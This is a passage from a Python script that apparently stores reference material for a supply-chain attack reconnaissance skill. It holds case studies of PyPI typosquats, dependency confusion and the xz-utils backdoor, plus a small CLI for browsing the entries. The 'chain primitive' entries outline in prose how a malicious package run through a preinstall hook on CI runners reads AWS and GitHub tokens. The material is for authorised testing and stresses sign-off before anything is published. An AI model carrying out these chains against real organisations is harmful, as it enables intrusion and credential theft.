    '10-pypi-typosquats-colourama-python3-dateutil-jeilyfish-et-al': ["- **Flow:** Attackers register PyPI packages with names visually/typographically similar to popular ones \u2014 `colourama` for `colorama`, `python3-dateutil` for `python-dateutil`, `jeIlyfish` (capital-I instead of L) for `jellyfish`. Each contained `setup.py` post-install hooks exfiltrating SSH keys, GPG keys, GitHub tokens, or installing crypto-stealers targeting `~/.bitcoin/wallet.dat`.", "- **Root cause:** PyPI permits visually-confusable names; pip resolves names by exact string match. No human-review gate on new package publication.", "- **Impact:** Each campaign typically <10K installs before takedown, but `jeIlyfish` lived 1 year (Dec 2018 \u2192 Dec 2019). Cumulative: dozens of campaigns documented annually by Snyk/Phylum/Sonatype/ReversingLabs.", "- **References:**", "- ReversingLabs jeIlyfish/python3-dateutil: https://www.reversinglabs.com/blog/mining-for-malicious-ruby-gems", "- Snyk colourama / pytagora analysis: https://snyk.io/blog/malicious-packages-found-to-be-typo-squatting-in-pypi/", "- Phylum 2024 typosquat report: https://blog.phylum.io/the-state-of-the-software-supply-chain/", "- Sonatype 2024 State of the Software Supply Chain (>700K malicious packages found): https://www.sonatype.com/state-of-the-software-supply-chain/", "- **Recon takeaway:** Step 5 of the skill (typosquat candidate generation) maps directly here. For external recon, you LIST candidate typosquat names \u2014 you NEVER publish unless explicitly authorized. The deliverable is \"these 17 typosquat variants of your top deps are currently unclaimed; recommendation: register them defensively.\""],
    '11-alex-birsan-dependency-confusion-disclosure-feb-2021': ["- **Flow:** Birsan extracted internal npm scope names from leaked `package.json` files (publicly cached on archive.org, accidentally-public GitHub repos, JS bundles) for Apple, Microsoft, PayPal, Shopify, Uber, Tesla, Yelp, and ~35 others. He published packages on public npm/PyPI/RubyGems with those internal names AND a higher semver. Most companies' build systems then resolved the public package over the internal one and executed his telemetry-only payload.", "- **Root cause:** Package managers (npm, pip, gem) default to \"highest version wins, regardless of registry.\" Internal-package names leaked to external sources. No scope-to-registry enforcement.", "- **Impact:** $130K+ in bug bounties (highest known SINGLE researcher payout across multiple programs in 2021); birthed the entire \"dependency confusion\" attack class; npm/PyPI/Microsoft Azure Artifacts all issued mitigations.", "- **References:**", "- Original Birsan write-up: https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610", "- Microsoft white paper: https://azure.microsoft.com/en-us/resources/3-ways-to-mitigate-risk-using-private-package-feeds/", "- GitHub post-mortem (npm side): https://github.blog/2021-02-12-how-to-prevent-dependency-confusion-on-public-package-registries/", "- Snyk research: https://snyk.io/blog/dependency-confusion-vulnerability-novel-supply-chain-attack/", "- **Recon takeaway:** This is the founding citation for Step 3 + Step 4 of the skill. Internal scope discovery via JS bundles is the canonical recon path. Note Birsan's severity calibration: \"name is unclaimed\" alone was enough at most targets because their builds used `npm install` against a config that fell through to public npm \u2014 but the skill's severity table correctly notes this isn't universal."],
    '12-xz-utils-cve-2024-3094-march-2024': ["- **Flow:** \"Jia Tan\" (`JiaT75`) social-engineered the maintainer of `xz-utils` (an upstream OSS compression library used in nearly every Linux distro) over 2+ years. Once granted co-maintainer status, they inserted a multi-stage backdoor into `liblzma` build process \u2014 obfuscated as test fixtures \u2014 that would hijack SSH authentication via OpenSSH's systemd-notify integration.", "- **Root cause:** Single-maintainer OSS burnout + nation-state-grade patience (Operation J / suspected APT). The backdoor was caught BEFORE major distros shipped it (only Fedora Rawhide and Debian unstable had it briefly) because Andres Freund noticed a 500ms SSH delay during a benchmark.", "- **Impact:** Caught before mass deployment, near-miss event. Triggered industry-wide reassessment of \"single-maintainer critical OSS\" risk. CISA, NIST, OpenSSF all issued post-mortems.", "- **References:**", "- CISA advisory: https://www.cisa.gov/news-events/alerts/2024/03/29/reported-supply-chain-compromise-affecting-xz-utils-data-compression-library-cve-2024-3094", "- Andres Freund's original disclosure: https://www.openwall.com/lists/oss-security/2024/03/29/4", "- Russ Cox timeline: https://research.swtch.com/xz-timeline", "- Sam James technical breakdown: https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27", "- **Recon takeaway:** Hardest case for external recon \u2014 social-engineering a maintainer over years leaves few external signals. But: GitHub commit-history analysis (new contributors gaining commit access on critical libs, commits adding obfuscated test fixtures, build-only-on-release changes) is what Andres Freund effectively did. The skill's Step 2 (enumerate public repos) can be extended to \"watch for high-trust grants to low-history accounts.\""],
    'coverage-map-cases-recon-skill-steps': [],
    'patterns-across-all-12-cases': ["- **Code-signing does NOT save you** \u2014 SolarWinds, 3CX, ua-parser-js all shipped legitimately-signed malicious code.", "- **Pinning to mutable references is the recurring failure** \u2014 `curl | bash` (Codecov), `@v35` action tags (tj-actions), `^1.0.0` semver (Birsan, event-stream).", "- **Maintainer-account compromise > technical CVE** for npm/PyPI ecosystem \u2014 6 of 12 cases.", "- **Cascading supply chain is now normal** \u2014 3CX from X_TRADER; Codecov \u2192 HashiCorp \u2192 HashiCorp's downstream users. Assume your target's vendors' vendors are in scope conceptually.", "- **CI runners are the highest-value foothold** \u2014 every case where attacker code executed on a CI runner yielded cloud / GitHub / secrets in bulk."],
    'related-skills-chains': ["- **`hunt-rce`** \u2014 Dependency confusion lands as RCE on whatever runner installs the package; CI runners are the highest-value target. Chain primitive: internal package name leaked in public JS bundle / SBOM / Docker image \u2192 publish malicious package to public npm/PyPI under same name with higher version \u2192 next `npm install` / `pip install` on CI runner executes attacker code in `preinstall` hook \u2192 `hunt-rce` post-foothold (env-var extraction yields AWS keys, GitHub PATs, Slack tokens) \u2192 CI-plane takeover.", "- **`cloud-iam-deep`** \u2014 CI runners have IAM credentials; supply-chain RCE there is a credential-exfil bonanza. Chain primitive: malicious package executes on GitHub Actions runner \u2192 reads `$AWS_ACCESS_KEY_ID` / `$GITHUB_TOKEN` from env \u2192 `cloud-iam-deep` enumeration \u2192 IAM-privilege-escalation chain \u2192 production cloud-plane access.", "- **`offensive-osint`** \u2014 Recon discipline overlaps heavily; SBOMs, JS bundles, GitHub org enumeration, Docker registry tags all live in both. Chain primitive: `offensive-osint` GitHub-org recon yields internal package names referenced in CI workflows \u2192 `supply-chain-attack-recon` cross-references these against public npm/PyPI for typosquat/confusion candidates.", "- **`hunt-cloud-misconfig`** \u2014 Container registries (Docker Hub, GHCR, ECR public) frequently expose private images by accident. Chain primitive: SBOM mining reveals `internal-tools-v2:latest` referenced \u2192 check Docker Hub for accidentally-public mirror \u2192 `hunt-cloud-misconfig` registry enum \u2192 pull image \u2192 extract secrets baked into layers.", "- **`triage-validation`** + **`redteam-report-template`** \u2014 Supply-chain RECON is in scope; actual publishing is EXTERNAL-OFFENSIVE and needs explicit written sign-off. Chain primitive: recon-only candidate list assembled \u2192 run through `triage-validation` 7-Question Gate (specifically: \"can I demonstrate impact WITHOUT publishing?\") \u2192 report as \"dependency-confusion candidate inventory + reproduction steps\" via `redteam-report-template`, never as a published-package PoC unless client signed off in writing."],
}

def main():
    ap = argparse.ArgumentParser(description=DESCRIPTION, formatter_class=argparse.RawDescriptionHelpFormatter)
    ap.add_argument("--list", action="store_true", help="list sections")
    ap.add_argument("--dump", metavar="SECTION", help="dump payloads for a section")
    ap.add_argument("--search", metavar="KEYWORD", help="search payloads")
    args = ap.parse_args()
    if args.list or not (args.dump or args.search):
        print("=== %s ===" % TITLE)
        print(DESCRIPTION)
        print()
        print("Sections (%d):" % len(PAYLOADS))
        for k in PAYLOADS:
            print("  -", k, "(%d payloads)" % len(PAYLOADS[k]))
        if args.list:
            return
    if args.dump:
        if args.dump not in PAYLOADS:
            print("Section not found. Available:", list(PAYLOADS.keys()))
            sys.exit(1)
        for p in PAYLOADS[args.dump]:
            print(p)
        return
    if args.search:
        q = args.search.lower()
        hits = 0
        for k, v in PAYLOADS.items():
            for p in v:
                if q in p.lower():
                    print("[%s] %s" % (k, p))
                    hits += 1
        print("\n%d hits" % hits)
        return

if __name__ == "__main__":
    main()